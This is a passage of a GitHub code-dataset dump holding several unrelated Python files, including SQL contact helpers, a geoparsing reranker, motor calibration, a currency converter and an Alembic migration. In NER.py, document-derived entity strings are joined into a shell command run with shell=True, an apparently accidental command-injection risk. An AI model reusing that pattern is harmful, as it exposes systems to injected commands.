contactListName)\n\n for contact_list in contact_lists: # there should be no duplicates\n return {'result': '-1'}\n\n cursor.execute(\"INSERT INTO contact_lists (user_id, contact_list_name) VALUES (%s, %s)\", (int(userID), contactListName))\n\n ids = cursor.execute(\"SELECT contact_list_id FROM contact_lists WHERE contact_list_name=%s\", contactListName)\n for id in ids:\n return {'result': id[0]}\n\n return {'result': '-1'} # should not happen\n\ndef updateContactListName(cursor, contactListID, contactListName):\n cursor.execute(\"UPDATE contact_lists SET contact_list_name = %s WHERE contact_list_id = %s\", (contactListName, int(contactListID)))\n\n\"\"\"\nGiven a contact list id, deletes all contacts in that contact list and the list itself\n\nthis action will remove all contacts associated with the contact list and the contact list itself\nin addition, any survey that was previously linked to the contact list being deleted will be linked to a null contact list (-1)\n\"\"\"\ndef deleteContactList(cursor, contactListID):\n # all of the surveys that point to this contact list need to be set to reference contact list -1 now\n cursor.execute(\"UPDATE surveys SET contact_list_id = -1 WHERE contact_list_id = %s\", (int(contactListID)))\n\n # delete all contacts in the contact list\n cursor.execute(\"DELETE FROM contacts WHERE contact_list_id = %s\", (int(contactListID)))\n\n # delete the contact list itself\n cursor.execute(\"DELETE FROM contact_lists WHERE contact_list_id = %s\", (int(contactListID)))\n\ndef getContacts(cursor, contactListID):\n table = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\", (str(contactListID)))\n contacts = []\n for entry in table:\n contacts.append({\"first name\": entry[2], \"last name\": entry[3], \"email address\": entry[4]})\n return contacts\n\ndef addContact(cursor, contactListID, firstName, lastName, emailAddress):\n table = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\", (int(contactListID)))\n for entry in table:\n if entry[4] == emailAddress:\n return jsonify({'result': '-1'}) # duplicate email address not allowed\n cursor.execute(\"INSERT INTO contacts (contact_list_id, first_name, last_name, email_address) VALUES(%s, %s, %s, %s)\", (int(contactListID), firstName, lastName, emailAddress))\n\n contact_ids = cursor.execute(\"SELECT contact_id FROM contacts WHERE email_address=%s\", emailAddress)\n for id in contact_ids:\n return {'result': id[0]}\n\n return {'result': \"-1\"}\n\n\"\"\"\nUpdates the first name of a contact using the contact id provided\n\"\"\"\ndef updateContactFirstName(cursor, contactID, firstName):\n cursor.execute(\"UPDATE contacts SET first_name = %s WHERE contact_id = %s\", (firstName, int(contactID)))\n\n\"\"\"\nUpdates the last name of a contact using the contact id provided\n\"\"\"\ndef updateContactLastName(cursor, contactID, lastName):\n cursor.execute(\"UPDATE contacts SET last_name = %s WHERE contact_id = %s\", (lastName, int(contactID)))\n\n\"\"\"\nUpdates the email address of a contact using the contact id provided\n\"\"\"\ndef updateContactEmailAddress(cursor, contactID, emailAddress):\n cursor.execute(\"UPDATE contacts SET email_address = %s WHERE contact_id = %s\", (emailAddress, int(contactID)))\n\n\n\"\"\"\ndeletes a contact from a contact list of the specified id\n\"\"\"\ndef deleteContact(cursor, contactID):\n cursor.execute(\"DELETE FROM contacts WHERE contact_id = %s\", (int(contactID)))\n\n\"\"\"\nGiven a user ID belonging to a user, return all the contact list information associated with the user.\nEach contact list entry will have contact information nested inside in a single JSON response\n\"\"\"\ndef getContactInfoDataStructure(cursor, userID):\n contactListsTable = cursor.execute(\"SELECT * FROM contact_lists WHERE user_id=%s\", (str(userID)))\n contactLists = []\n for contactList in contactListsTable:\n contacts_ary = []\n contacts = cursor.execute(\"SELECT * FROM contacts WHERE contact_list_id=%s\",(str(contactList[0])))\n size = 0\n for contact in contacts:\n contacts_ary.append({\"id\": contact[0], \"first_name\": contact[2], \"last_name\": contact[3], \"email\": contact[4]}) #return contact id, first name, last name, email address\n size += 1\n contactLists.append({'contact_list_id': contactList[0], 'user_id': contactList[1], 'contact_list_name': contactList[2], 'contacts': contacts_ary, 'size': size})\n return contactLists\n","repo_name":"Feedback-Friend/Web-Application","sub_path":"src/backend/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74623593474","text":"import subprocess\nimport requests\nimport spacy\nimport sys\nimport json\nimport os\nimport glob\nimport geocoder\nfrom fuzzywuzzy import process, fuzz\nfrom sklearn.cluster import AgglomerativeClustering\nimport numpy as np\n\nACCEPTED_TAGS = [\"GPE\", \"LOC\"]\nCMD_TEMPLATE = \"./runGeoParse.sh\"\nGEONAME_URL = \"http://api.geonames.org/hierarchyJSON?geonameId={}&username=ngds_adept&style=full\"\nFUZZY_SIMILARITY_THRESHOLD = 0.85\nNUM_CLUSTERS_PERCENT = 0.2\nLOCATION_SIZE_THRESHOLD = 0.75\nDEBUG = False\nif \"DEBUG\" in os.environ:\n if os.environ[\"DEBUG\"].lower() == \"true\":\n DEBUG = True\n\n\"\"\"\nTEMPORARY NOTES:\n\nCurrently: given the entities in a document:\n 1. will fuzzy string match the geoparse results and filter out the strings\n that aren't close to the original term.\n 2. requests hierarchy of each remaining location (results from geoparse)\n 3. clusters the locations based on their continent and filters all but the\n largest continents (hit based, not size)\n 4. clusters the locations based on their country and filters all but the\n largest countries (hit based, not size)\n 5. clusters remaining results based on physical location\n 6. for each (remaining) entity that was found in the document, choose\n geoparse result that belongs to the largest cluster, then remove\n all other occurances before checking for the next result\n\n\nTODO:\n 1. for the US, bring filtering down to the state level\n 2. do something different with multiword queries -- match each individual word?\n 3. get some benchmark results\n 4. write up for Andrew\n\n\n\"\"\"\n\n\nclass NER:\n\n def debug(self, msg):\n if DEBUG: print(f\"[DEBUG] {msg}\\n\")\n\n def __init__(self, files_location: str, output_path: str):\n self.nlp = spacy.load(\"en_core_web_trf\")\n self.files_location = files_location\n self.output_path = output_path\n self.load_docs()\n document_entities = self.tag_entities()\n self.run_geonorm(document_entities)\n\n def load_docs(self):\n print(\"Loading docs...\")\n self.txt_docs = {}\n for file in os.listdir(self.files_location):\n if file.endswith(\".txt\") or file.endswith(\"text\"):\n f = open(self.files_location + file, \"r\", encoding=\"utf8\")\n self.txt_docs[file] = '\\n'.join(f.readlines())\n f.close()\n self.debug(\"file contents: \" + str(self.txt_docs[file]))\n print(\"Docs loaded.\")\n\n \"\"\"\n Collects all of the entities for each doc and stores in a dictionary\n returns: a dictionary mapping the document name to a list of strings (the entities)\n \"\"\"\n\n def tag_entities(self):\n # {doc1: [ent11, ent12, ...], doc2: [ent21, ent22, ..], ...}\n documents = {}\n for docname in self.txt_docs.keys():\n print(f\"Tagging {docname}...\")\n doc = self.txt_docs[docname]\n spacy_doc = self.nlp(doc)\n # Entities for the current document\n entities = []\n for ent in spacy_doc.ents:\n if ent.label_ not in ACCEPTED_TAGS:\n continue\n entities.append(ent.text)\n documents[docname] = entities\n self.debug(f\"\\tFound {len(entities)} entities in the document\")\n print(\"Done tagging documents\")\n return documents\n\n def run_geonorm(self, documents):\n self.debug(\"Running geoparse\")\n for docname in documents.keys():\n if len(documents[docname]) == 0:\n continue\n basename = os.path.splitext(os.path.basename(docname))[0]\n multiword = {}\n cmd = [CMD_TEMPLATE]\n # Creats the cmd so it is ./runGeoParse.sh \"ent1\" \"ent2\" ...\n for ent in documents[docname]:\n cmd.append(f\"\\\"{ent}\\\"\")\n \"\"\"\n if len(ent.split()) > 1:\n multiword[ent] = geocoder.geonames(ent, key=\"geonorm_rerank\")\n print(multiword)\n else:\n cmd.append(f\"\\\"{ent}\\\"\")\n \"\"\"\n pipe = subprocess.run(\" \".join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n with open(f\"{self.output_path}/{basename}_geoparse_output.txt\", 'w+', encoding='utf8') as f:\n f.write(pipe.stdout.decode('utf-8'))\n\n for tf in glob.glob(\"/tmp/geoparse*/*\"):\n os.remove(tf)\n reranked = self.rerank_results(pipe.stdout.decode('utf-8'))\n\n self.debug(\"Saving reranked_results - (location, geoname_id)\")\n with open(f\"{self.output_path}/{basename}_reranked_results.txt\", \"w+\", encoding=\"utf8\") as f:\n f.write(str(reranked))\n\n results_dict = {}\n document_results = []\n ent_idx = 0\n for location in reranked.keys():\n geoparse_results = reranked[location]\n for result in geoparse_results:\n self.debug(f\"Getting hierarchy of {result[0]} which was returned for {location} - {result[1]}\")\n # TODO: speed up runtime by running this in multiple threads, this is mainly just lots of\n # external IO waiting\n result_dict = self.get_geoname_hierarchy(result[1])\n if result_dict is not None:\n result_dict[\"NAME\"] = result[0]\n result_dict[\"ENTITY\"] = location\n result_dict[\"GROUP\"] = ent_idx\n # result_dict has ID,CONT,PCLI,LAT,LNG,NAME,GROUP of the geoparse result\n document_results.append(result_dict)\n ent_idx += 1\n\n self.debug(\"Saving result_dict - [{{ID:~,CONT:~...}},...]\")\n with open(f\"{self.output_path}/{basename}_result_dict.txt\", \"w+\", encoding=\"utf8\") as f:\n f.write(str(document_results))\n\n # document_results = [{ID:~,CONT:~,PCLI:~,LAT:~,:LNG:~,NAME:~,GROUP:~}, {ID:~,...}, ...]\n document_results = self.remove_region_outliers(document_results, \"CONT\")\n document_results = self.remove_region_outliers(document_results, \"PCLI\")\n\n X = []\n for result in document_results:\n coord = [float(result[\"LAT\"]), float(result[\"LNG\"])]\n X.append(coord)\n\n clusters = self.cluster_locations(np.array(X))\n if clusters is None:\n print(\"Couldn't find clusters in this document! Skipping.\")\n continue\n self.decide_final_results(document_results, clusters, ent_idx, basename)\n\n \"\"\"\n n_groups: the number of entities found in document that are remaining\n \"\"\"\n\n def decide_final_results(self, document_results, clusters, n_groups, basename):\n final_document_results = []\n self.debug(\"Filtering final clusters\")\n cluster_sizes = self.get_cluster_sizes(clusters)\n self.debug(f\"cluster_sizes: {str(cluster_sizes)}\")\n max_groups = [None] * n_groups\n # add the cluster to the document results\n for i in range(len(document_results)):\n document_results[i][\"CLUSTER\"] = clusters.labels_[i]\n\n for group in range(n_groups):\n self.debug(f\"filtering group {group}...\")\n max_cluster_size = -1\n max_cluster_result = None\n for result in document_results:\n if result[\"GROUP\"] != group:\n continue\n self.debug(f\"checking result {str(result)}\")\n cluster = clusters.labels_[result[\"CLUSTER\"]]\n if cluster_sizes[cluster] > max_cluster_size:\n max_cluster_size = cluster_sizes[cluster]\n max_cluster_result = result\n\n if max_cluster_result is not None:\n self.debug(f'max result for group {group} was from cluster {max_cluster_result[\"CLUSTER\"]}')\n final_document_results += list(filter(lambda r: r[\"GROUP\"] != group or r is max_cluster_result, document_results))\n self.debug(\"finished finalizing results...\")\n self.debug(f\"{str(document_results)}\")\n with open(f\"{self.output_path}/{basename}_final_results.txt\", \"w+\", encoding=\"utf8\") as f:\n f.write(str(final_document_results))\n\n def get_cluster_sizes(self, clusters):\n cluster_sizes = [0] * clusters.n_clusters\n for label in clusters.labels_:\n cluster_sizes[label] += 1\n return cluster_sizes\n\n \"\"\"\n Given a list of results in the format returned by 'get_geoname_hierarchy', will find the region\n where the most entities reside and filter out entities not in that region. Level is the key for the\n dictionary that indicates the regional level to filter. Works with \"CONT\" and \"PCLI\"\n \"\"\"\n\n def remove_region_outliers(self, doc_results, level):\n self.debug(f\"Removing {level} outliers\")\n cont_counts = {}\n max_val = 1\n num_results = len(doc_results)\n for result in doc_results:\n if result[level] in cont_counts.keys():\n cont_counts[result[level]] += 1\n if cont_counts[result[level]] > max_val:\n max_val = cont_counts[result[level]]\n else:\n cont_counts[result[level]] = 1\n\n self.debug(f\"counts: {cont_counts}\")\n filtered_results = []\n for result in doc_results:\n if cont_counts[result[level]] >= max_val * LOCATION_SIZE_THRESHOLD:\n filtered_results.append(result)\n self.debug(\"added to result\")\n return filtered_results\n\n \"\"\"\n Given the geoname id of a location, will construct a dictionary that contains the ID, CONT, PCLI, LAT, and LONG\n of the location from geonames and return the dictionary. If any of those fields aren't available from geonames,\n then None is returned\n \"\"\"\n\n def get_geoname_hierarchy(self, id):\n result = {\"ID\": id, \"CONT\": None, \"PCLI\": None, \"LAT\": -1, \"LNG\": -1}\n r = requests.get(GEONAME_URL.format(id))\n if r.status_code != 200:\n print(f\"Invalid status code returned! {r.status_code}\")\n GEONAME_BREAKER = True\n exit()\n\n if \"geonames\" in json.loads(r.text):\n data = json.loads(r.text)[\"geonames\"]\n if len(data) == 0:\n return None\n else:\n return None\n\n result[\"LAT\"] = data[-1][\"lat\"]\n result[\"LNG\"] = data[-1][\"lng\"]\n admin = \"\"\n for name in data:\n if \"fcode\" in name.keys() and name[\"fcode\"] == \"CONT\":\n result[\"CONT\"] = name[\"name\"]\n elif \"fcode\" in name.keys() and name[\"fcode\"] == \"PCLI\":\n result[\"PCLI\"] = name[\"name\"]\n elif \"fcode\" in name.keys() and name[\"fcode\"] == \"ADM1\":\n admin = name[\"name\"]\n if result[\"PCLI\"] == \"United States\":\n result[\"PCLI\"] = admin\n if result[\"CONT\"] is None or result[\"PCLI\"] is None:\n self.debug(\"Got NONE result\")\n return None\n else:\n return result\n\n\n def cluster_locations(self, X):\n # X is a 2xN (np) matrix of points\n\n clusters = None\n self.debug(f\"Fitting points: {X}\")\n n_clusters = int(X.shape[0] * NUM_CLUSTERS_PERCENT)\n ward = AgglomerativeClustering(n_clusters=n_clusters, linkage='ward')\n try:\n clusters = ward.fit(X)\n except:\n self.debug(\"Couldn't cluster locations!\")\n return clusters\n\n # reranked is a dictionary mapping locations to lists of reranked tuples of locations\n # only keeps the closest matches\n # \"location\": [(loc1, geonorm_id), ...]\n def rerank_results(self, output):\n locations = output.split(\"\\n\\n\")\n reranked = {}\n for loc in locations:\n reranked.update(self.rerank_location(loc.strip()))\n return reranked\n\n def rerank_location(self, output):\n lines = output.split(\"\\n\")\n selected_locs = [(loc.split(\":\")[0].strip(), loc.split(\":\")[1].strip()) for loc in lines[1:]]\n\n results = []\n for loc in selected_locs:\n similarity = fuzz.ratio(lines[0].strip(), loc[0])\n # Ignore results that are too different from the parsed entity\n if similarity >= FUZZY_SIMILARITY_THRESHOLD:\n results.append((loc[0], loc[1]))\n\n results.sort(key=lambda x: x[1], reverse=True)\n result_dict = {lines[0].strip(): results}\n return result_dict\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 1:\n print(\"Too few arguments given!\")\n ner = NER(\"test/\")\n else:\n path = sys.argv[1]\n outpath = sys.argv[2] if len(sys.argv) == 3 else \"./output/\"\n ner = NER(path, outpath)\n","repo_name":"ngds/geoparse-rerank","sub_path":"NER.py","file_name":"NER.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42785906821","text":"import pypot.dynamixel as pd\nimport time\n\n# get ports and start connection to motors\nports = pd.get_available_ports()\nmotors = pd.Dxl320IO(ports[0],1000000)\n\nmotor_id = motors.scan(range(20))\n\n# only work with one motor at a time\nif (len(motor_id)>1):\n print(\"Only connect one motor at a time!\")\n quit()\n\nif (len(motor_id)<1):\n\tprint(\"No connected motors found! Did you remember to connect external power?\")\n\tquit()\n\t\nmotor_id = motor_id[0]\n\nprint(\"Motor \"+str(motor_id)+\" found!\")\n\nnew_id_str = input(\"Enter motor ID (1-3 for towers, 4 for base, 5+ for etc). Press enter to leave the ID as is: \")\n\nif new_id_str != '':\n new_id = int(new_id_str)\n motors.disable_torque([motor_id])\n print(\"Changing motor ID changed from \"+str(motor_id)+\" to \"+str(new_id))\n motors.change_id({motor_id:new_id})\n time.sleep(0.2)\n\n if (motors.ping(new_id) == True):\n motor_id = new_id\n else:\n print(\"Sorry, didn't work. Unplug and replug the motor and run again.\")\n\n# set motor to 100\nmotors.set_goal_position({motor_id:100})\ninput(\"Motor position: 100; Attach horn then press 'Enter'. \")\n\n# set motor to 0\nmotors.set_goal_position({motor_id:0})\ninput(\"Motor position: 0; Calibrate string length then press 'Enter'. \")\n\n# set motor back to 100\nmotors.set_goal_position({motor_id:100})\nprint(\"Motor position: 100; Calibration complete!\")\n\nquit()\n","repo_name":"hrc2/blossom-public","sub_path":"motor_calib.py","file_name":"motor_calib.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"2587819313","text":"#!/usr/bin/env python\nimport math\nimport sys\nfrom typing import Callable, Generator, Optional\n\n\ndef convert(num: float) -> Optional[str]:\n \"\"\"转换数字为规范的书写格式\"\"\"\n splited = _split(num)\n if splited is None:\n return None\n integer, (frac0, frac1) = splited\n\n # 超过 9999_9999_9999_9999\n if len(integer) > 16:\n return None\n\n chunks = []\n for chunk in _cut(integer):\n chunks.append(chunk)\n\n result = \"\"\n suffix = [\"仟\", \"佰\", \"拾\", \"\"]\n transer = [\"零\", \"壹\", \"贰\", \"叁\", \"肆\", \"伍\", \"陆\", \"柒\", \"捌\", \"玖\"]\n primarys = [\"万亿\", \"亿\", \"万\", \"\"]\n\n # 待填入 0 标志\n is_zero = False\n for i, chunk in enumerate(chunks[::-1]):\n index = 4 - len(chunks) + i\n tmp, (start_zero, end_zero) = _convert_chunk(\n chunk, suffix, transer, primarys[index]\n )\n\n # 稍后再填入 0,因为可能无需填 0\n if not tmp:\n is_zero = True\n continue\n\n if i > 0 and (is_zero or start_zero):\n result += \"零\"\n\n result += tmp\n\n # 尾部含 0 即待填入 0\n is_zero = end_zero\n\n full_zero = integer[-1] == 0 and len(integer) == 1\n if not full_zero:\n result += \"圆\"\n\n if not full_zero and frac0 == 0 and frac1 == 0:\n result += \"整\"\n return result\n\n if frac0 != 0:\n result += f\"{transer[frac0]}角\"\n\n if frac1 != 0:\n result += f\"{transer[frac1]}分\"\n\n return result\n\n\ndef _split(num: float) -> Optional[tuple[list[int], tuple[int, int]]]:\n \"\"\"将数字划分为小数和整数部分,保留两位小数,不足补 0\"\"\"\n if not math.isfinite(num) or num < 0:\n return None\n\n tmp = f\"{num}\"\n snum = tmp.split(\".\")\n\n _integer = list(snum[0])\n integer = [int(x) for x in _integer]\n if len(snum) == 2:\n fracs = snum[1]\n if len(fracs) == 2:\n return integer, (int(fracs[0]), int(fracs[1]))\n\n return integer, (int(fracs[0]), 0)\n return integer, (0, 0)\n\n\ndef _convert_chunk(\n chunk: list[int], suffix: list[str], transer: list[str], primary: str\n) -> tuple[str, tuple[bool, bool]]:\n \"\"\"将 4 位数字转化为指定格式,并返回头部和尾部是否为 0\"\"\"\n result = \"\"\n\n if len(set(chunk)) == 1 and chunk[0] == 0:\n return result, (True, True)\n\n make_unit: Callable[[int], str] = lambda i: transer[chunk[i]] + suffix[i]\n\n zero = False\n if chunk[0] != 0:\n result = make_unit(0)\n zero = True\n\n if chunk[1] != 0:\n result += make_unit(1)\n zero = True\n elif zero and (chunk[2] != 0 or chunk[3] != 0):\n result += \"零\"\n zero = False\n\n if chunk[2] != 0:\n result += make_unit(2)\n elif zero and chunk[3] != 0:\n result += \"零\"\n\n if chunk[3] != 0:\n result += make_unit(3)\n\n result += primary\n return result, (chunk[0] == 0, chunk[3] == 0)\n\n\ndef _cut(some: list[int]) -> Generator[list[int], None, None]:\n \"\"\"将给定 list 切分为长度为 4 的 list,逆序,不足补 0\"\"\"\n while len(some) > 4:\n yield some[-4:]\n some = some[:-4]\n\n yield [0] * (4 - len(some)) + some\n\n\ndef main() -> None:\n if len(sys.argv) != 2:\n _help(sys.argv[0])\n return\n\n result = convert(float(sys.argv[1]))\n if result:\n print(result)\n return\n\n print(\"转换失败\")\n\n\ndef _help(name: str) -> None:\n print(f\"用法: {name} <数字>\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nidhoggfgg/mini-projects","sub_path":"convert-money/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"4836293344","text":"from cnnClassifier import logger\nfrom cnnClassifier.pipeline.stage_01_data_ingestion import DataIngestionTrainingPipeline\nfrom cnnClassifier.pipeline.stage_02_prepare_base_model import PrepareBaseModelTrainingPipeline\nfrom cnnClassifier.pipeline.stage_03_training import ModelTrainingPipeline\nfrom cnnClassifier.pipeline.stage_04_evaluation import EvaluationPipeline\n\n\nSTAGE_NAME = \"Data Ingestion stage\"\ntry:\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\") \n data_ingestion = DataIngestionTrainingPipeline()\n data_ingestion.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\nSTAGE_NAME = \"Prepare base model\"\ntry: \n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n prepare_base_model = PrepareBaseModelTrainingPipeline()\n prepare_base_model.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\nSTAGE_NAME = \"Training\"\ntry: \n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n model_trainer = ModelTrainingPipeline()\n model_trainer.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n\n\nSTAGE_NAME = \"Evaluation stage\"\ntry:\n logger.info(f\"*******************\")\n logger.info(f\">>>>>> stage {STAGE_NAME} started <<<<<<\")\n model_evalution = EvaluationPipeline()\n model_evalution.main()\n logger.info(f\">>>>>> stage {STAGE_NAME} completed <<<<<<\\n\\nx==========x\")\n\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n","repo_name":"krishnaik06/Chicken-Disease-Classification-Projects","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"23584926351","text":"import heapq as hq\r\n\r\n\r\ndef solve(N, Q, horse_distances, horse_speeds, city_distances, pairs):\r\n out = []\r\n for start_city, end_city in pairs:\r\n start_city -= 1\r\n end_city -= 1\r\n # tup = (time, city_id, current_horse_distance_remain, current_horse_speed)\r\n heap = [(0., start_city, 0., 1.)]\r\n reached_cities = set()\r\n reached_cities_top_horses = dict()\r\n while True:\r\n time, city_id, current_horse_distance_remain, current_horse_speed = hq.heappop(heap)\r\n if city_id == end_city:\r\n break\r\n if city_id in reached_cities:\r\n good_horse = False\r\n for top_horse_dist, top_horse_speed in reached_cities_top_horses[city_id]:\r\n if current_horse_distance_remain > top_horse_dist or current_horse_speed > top_horse_speed:\r\n good_horse = True\r\n if good_horse is False:\r\n continue\r\n new_top_horses = [(current_horse_distance_remain, current_horse_speed)]\r\n for top_horse in reached_cities_top_horses[city_id]:\r\n if top_horse[0] > current_horse_distance_remain or top_horse[1] > current_horse_speed:\r\n new_top_horses.append(top_horse)\r\n reached_cities_top_horses[city_id] = new_top_horses\r\n else:\r\n reached_cities.add(city_id)\r\n reached_cities_top_horses[city_id] = [(current_horse_distance_remain, current_horse_speed)]\r\n\r\n new_horse_d = horse_distances[city_id]\r\n new_horse_s = horse_speeds[city_id]\r\n for to_id, dist in enumerate(city_distances[city_id]):\r\n if dist == -1:\r\n continue\r\n if dist <= current_horse_distance_remain:\r\n hq.heappush(heap, (time + dist * 1. / current_horse_speed, to_id, current_horse_distance_remain - dist, current_horse_speed))\r\n if dist <= new_horse_d:\r\n hq.heappush(heap, (time + dist * 1. / new_horse_s, to_id, new_horse_d - dist, new_horse_s))\r\n out.append(str(time))\r\n return ' '.join(out)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n output = []\r\n fname = 'C-small-attempt2'\r\n with open(fname + '.in') as f:\r\n inputs = [line.strip() for line in f]\r\n\r\n num_cases = int(inputs[0])\r\n line = [1]\r\n\r\n def next_line():\r\n text = inputs[line[0]]\r\n line[0] += 1\r\n return text\r\n\r\n for i in range(num_cases):\r\n N, Q = map(int, next_line().split())\r\n horse_distances = []\r\n horse_speeds = []\r\n for _ in range(N):\r\n dist, speed = map(int, next_line().split())\r\n horse_distances.append(dist)\r\n horse_speeds.append(speed)\r\n city_distances = []\r\n for _ in range(N):\r\n city_distances.append(list(map(int, next_line().split())))\r\n pairs = []\r\n for _ in range(Q):\r\n u, v = map(int, next_line().split())\r\n pairs.append((u, v))\r\n\r\n print(i + 1)\r\n output.append(\"Case #%d: \" % (i + 1) + str(solve(N, Q, horse_distances, horse_speeds, city_distances, pairs)))\r\n\r\n with open(fname + '.out', 'w') as f:\r\n f.write('\\n'.join(output))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/315.py","file_name":"315.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25597487515","text":"from typing import Tuple\nfrom .cogs import Cog, EmptyCog, Player\nfrom .special_cogs import BoostedCog\nimport numpy as np\n\nclass Board:\n def __init__(self, height: int = 8, width: int = 12, locked: bool = True) -> None:\n self._visualization_board = ''\n self.board = np.array([[EmptyCog() for w in range(width)] for h in range(height)])\n if locked:\n self.mask = np.zeros_like(self.board)\n else:\n self.mask = np.ones_like(self.board)\n self.storage = []\n self.total_build = 0\n self.total_flaggy = 0\n self.total_exp = 0\n\n def unlock(self, mask: np.array):\n assert mask.shape == self.board.shape, \"Mask shape is different than board shape!\"\n self.mask = mask\n \n def empty(self) -> bool:\n for cog in self.board.flatten():\n if not isinstance(cog, EmptyCog):\n return False\n return True\n\n def place(self, x:int, y:int, cog: Cog = EmptyCog()) -> None:\n if self.validate(x, y):\n assert isinstance(cog, Cog), \"You can't place non-cogs on board!\"\n if not isinstance(self.board[y, x], EmptyCog):\n self.storage.append(self.board[y, x])\n self.board[y,x] = cog\n \n def clear(self):\n self.reset_board_values()\n for x in range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n self.place(x, y, EmptyCog())\n\n def reset_board_values(self):\n self.total_build = 0\n self.total_flaggy = 0\n self.total_exp = 0\n\n def validate(self, x, y) -> bool:\n return (x >= 0 and y >= 0 and x < self.board.shape[1] and y < self.board.shape[0]) and (self.mask[y, x])\n\n def get_totals(self) -> Tuple[int, int, int]:\n return self.total_build, self.total_flaggy, self.total_exp\n\n def calculate_board(self):\n self.reset_loop()\n self.multiply_loop()\n self.sum_loop()\n\n def reset_loop(self):\n self.reset_board_values()\n for c in self.board.flatten():\n c.reset()\n\n def multiply_loop(self):\n for x in range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n if self.validate(x, y):\n c = self.board[y, x]\n if isinstance(c, BoostedCog):\n boosted_coordinates, boosted_values = c.boosted()\n for bc in boosted_coordinates:\n dx, dy = bc[0], bc[1]\n \n if self.validate(x+dx, y+dy):\n boosted_cog = self.board[y+dy, x+dx]\n boosted_cog.apply_boost(*boosted_values)\n self.board[y+dy, x+dx] = boosted_cog\n \n def sum_loop(self):\n for x in range(self.board.shape[1]):\n for y in range(self.board.shape[0]):\n if self.validate(x, y):\n c = self.board[y, x]\n self.total_build +=c.get_values()[0]\n self.total_flaggy += c.get_values()[1]\n self.total_exp += c.get_values()[2]\n\n def show(self):\n self.print_rates()\n self.print_board()\n self.print_storage()\n self.print_players_info()\n\n def print_rates(self):\n print(\"Total build rate: \" + str(self.total_build) + '\\n' +\n \"Total flaggy rate: \" + str(self.total_flaggy) + '\\n' +\n \"Total extra exp: \" + str(self.total_exp))\n\n def print_board(self):\n board_print = ''\n for y in range(self.board.shape[0]):\n for x in range(self.board.shape[1]):\n board_print += str(self.board[y, x]) + '\\t'\n board_print = board_print[:-1] + '\\n'\n self._visualization_board = board_print\n print(self._visualization_board)\n \n def print_storage(self):\n storage_print = 'In storage: '\n for s in self.storage:\n storage_print += str(s) + ', '\n print(storage_print)\n\n def print_players_info(self):\n print('Player stats:')\n for c in self.board.flatten():\n if isinstance(c, Player):\n print(c.info())","repo_name":"Belvenix/IdleonCogOptimizer","sub_path":"src/python/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"35280328063","text":"\"\"\"staff remarks\n\nRevision ID: b5578f6deba6\nRevises: 7f01a013a976\nCreate Date: 2021-06-10 23:00:12.600023\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b5578f6deba6'\ndown_revision = '7f01a013a976'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n staff_remark_codes = op.create_table('staff_remark_codes',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('description', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code')\n )\n\n op.bulk_insert(\n staff_remark_codes,\n [\n {\n \"code\": \"BLANKAFFIDAVIT\",\n \"description\": \"Affidavit is blank / affidavit is not attached\",\n \"default\": False\n },\n {\n \"code\": \"MISSINGSEAL\",\n \"description\": \"Affidavit is missing seal\",\n \"default\": False\n },\n {\n \"code\": \"INCOMPLETE\",\n \"description\": \"One or more required fields is incomplete\",\n \"default\": False\n },\n {\n \"code\": \"NOTPRACTICING\",\n \"description\": \"Lawyer/notary is not practicing\",\n \"default\": False\n },\n {\n \"code\": \"NAMEMISMATCH\",\n \"description\": \"User profile name does not match the name on the affidavit\",\n \"default\": False\n },\n ]\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('staff_remark_codes')\n # ### end Alembic commands 